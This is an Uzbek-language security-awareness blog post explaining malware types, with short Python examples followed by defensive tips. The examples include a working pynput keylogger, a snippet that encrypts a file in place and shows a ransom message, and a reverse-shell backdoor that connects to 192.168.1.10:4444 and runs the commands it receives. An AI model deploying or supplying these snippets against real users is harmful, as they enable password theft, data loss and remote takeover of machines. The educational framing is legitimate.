education

Malware nima va u qanday ishlaydi? (Kod misollari bilan)

Malware nima va u qanday ishlaydi? (Kod misollari bilan) - ProblemStack.uz Blog Article
IbragimovQuvonchbek - ProblemStack.uz Profile
IbragimovQuvonchbek

March 14, 2026

2 min read 14 views

Malware nima va u qanday ishlaydi? (Kod misollari bilan)

Kiberxavfsizlik sohasida malware (malicious software) — bu kompyuter tizimiga zarar yetkazish, ma’lumotlarni o‘g‘irlash yoki tizim ustidan nazoratni qo‘lga olish uchun yaratilgan dasturiy ta’minotdir. Malware oddiy foydalanuvchilar uchun ko‘pincha sezilmaydi, chunki u yashirin tarzda ishlash uchun mo‘ljallangan.

Ular turli shakllarda bo‘lishi mumkin: virus, worm, trojan, ransomware yoki spyware. Quyida malware qanday ishlashini tushunish uchun ta’limiy va soddalashtirilgan kod misollarini ko‘rib chiqamiz.

1. Oddiy “Malicious Script” misoli (Python)

Quyidagi kod zararli emas, lekin malware qanday ishlashini tushuntirish uchun soddalashtirilgan model hisoblanadi.

import os

# Foydalanuvchi fayllarini qidirish
target_folder = "/home/user/Documents"

for root, dirs, files in os.walk(target_folder):
    for file in files:
        print("Topildi:", os.path.join(root, file))

Bu kod nima qiladi?

  1. Kompyuter ichidagi Documents papkasini skaner qiladi.

  2. Ichidagi barcha fayllarni topadi.

  3. Malware real holatda shu fayllarni:

    • serverga yuborishi

    • o‘chirishi

    • shifrlashi mumkin.

2. Keylogger (klaviatura yozuvlarini yozib olish)

Spyware malware ko‘pincha keylogger orqali foydalanuvchi yozgan parollarni yozib oladi.

from pynput.keyboard import Listener

def on_press(key):
    with open("log.txt", "a") as f:
        f.write(str(key) + "\n")

with Listener(on_press=on_press) as listener:
    listener.join()

Bu kod nima qiladi?

  • Klaviaturada bosilgan har bir tugmani yozib boradi

  • Natijani log.txt fayliga saqlaydi

Real malware:

  • bank parollarini

  • email loginlarini

  • administrator parollarini

o‘g‘irlashi mumkin.

3. Ransomware qanday ishlaydi (soddalashtirilgan model)

Ransomware foydalanuvchi fayllarini shifrlab qo‘yadi.

from cryptography.fernet import Fernet

key = Fernet.generate_key()
cipher = Fernet(key)

with open("important.txt", "rb") as file:
    data = file.read()

encrypted = cipher.encrypt(data)

with open("important.txt", "wb") as file:
    file.write(encrypted)

print("Your files are encrypted!")

Natija

  • Fayl shifrlanadi

  • ochish uchun kalit kerak bo‘ladi

Hackerlar keyin shunday xabar qoldiradi:

Send 500$ in Bitcoin to recover your files

4. Backdoor malware misoli

Backdoor hackerga kompyuterni masofadan boshqarish imkonini beradi.

import socket
import subprocess

s = socket.socket()
s.connect(("192.168.1.10", 4444))

while True:
    command = s.recv(1024).decode()
    output = subprocess.getoutput(command)
    s.send(output.encode())

Bu nima qiladi?

  1. Kompyuter hacker serveriga ulanadi

  2. Hacker buyruq yuboradi

  3. Kompyuter uni bajaradi

Masalan:

dir
rm file.txt
whoami

Malwaredan qanday himoyalanish mumkin?

Quyidagi qoidalar juda muhim:

1. Antivirus ishlatish

Masalan:

  • Windows Defender

  • Kaspersky

  • Bitdefender

2. Noma’lum fayllarni ochmaslik

Email orqali kelgan .exe yoki .zip fayllar juda xavfli bo‘lishi mumkin.

3. Pirat dasturlarni ishlatmaslik

Ko‘p malware aynan crack qilingan dasturlar orqali tarqaladi.

4. Operatsion tizimni yangilab turish

Ko‘p malware eski tizim zaifliklaridan foydalanadi.

Xulosa

Malware zamonaviy kiberxavfsizlikning eng katta tahdidlaridan biridir. U foydalanuvchi ma’lumotlarini o‘g‘irlashi, kompyuterlarni nazorat qilishi yoki fayllarni shifrlab pul talab qilishi mumkin. Shu sababli foydalanuvchilar ham, tashkilotlar ham tizim xavfsizligiga jiddiy e’tibor berishlari zarur.

Tags:

#Automation #Exploit #Python #cyber attacks #cybersecurity #malware #problemstack.uz #programming #security awareness

Share this article

Twitter Facebook LinkedIn Telegram

Related Posts

Stack xotirasi tushunchasi: PWN va Binary Exploitation asoslari

Stack xotirasi — dastur ishlashi davomida eng muhim va ayni paytda eng xavfli xotira sohalaridan biridir. Ushbu maqolada stack qanday ishlashi, stack overflow nima ekanligi va nima sababdan u PWN hamda CTF muammolarida muhim rol o‘ynashi professional darajada tushuntiriladi. Maqola boshlovchilar va xavfsizlikka qiziquvchilar uchun mo‘ljallangan.

Dec 19, 2025

Steganografiya CTF Masalalarini Yechish Bo‘yicha To‘liq Professional Qo‘llanma

Steganografiya — oddiy ko‘ringan rasm, audio yoki fayl ichiga yashirilgan maxfiy ma’lumotlarni aniqlash san’atidir. Ushbu qo‘llanmada siz CTF musobaqalarida uchraydigan stego masalalarini tizimli ravishda qanday tekshirish, qaysi vositalarni qo‘llash va yashirin flagnni topishning eng samarali usullarini o‘rganasiz.

Dec 03, 2025

SQL Injection nima va undan qanday himoyalanish mumkin? To‘liq tushuncha va real kod misollari

SQL Injection (SQLi) — bu hujumchi foydalanuvchi kiritadigan ma’lumotlar orqali SQL so‘roviga zararli kod qo‘shishi va natijada ma’lumotlar bazasiga ruxsatsiz kirishi mumkin bo‘lgan xavfsizlik zaifligidir. Bu zaiflik OWASP Top 10’da uzoq yillardan beri yetakchi o‘rinlarda turadi. U noto‘g‘ri yozilgan backend kod, filtrlanmagan input va sanitizatsiyasiz SQL so‘rovlari natijasida yuzaga keladi.

Dec 01, 2025

🎣 Phishing hujumlari qanday ishlaydi? To‘liq professional tahlil

Kiberjinoyatchilar tomonidan eng ko‘p qo‘llaniladigan hujum usullaridan biri — phishing (“fishing” — ma’nosi: "qarmoqqa ilish"). Bu usulda hujumchi texnik ekspluatatsiya emas, balki inson psixologiyasidan foydalanadi. Shu sababli phishingga qarshi eng yaxshi himoya — xabardorlik. Ushbu maqolada phishingning ishlash mexanizmi, turli shakllari, real ssenariylar va unga qarshi samarali himoya choralarini tahlil qilamiz.

Nov 30, 2025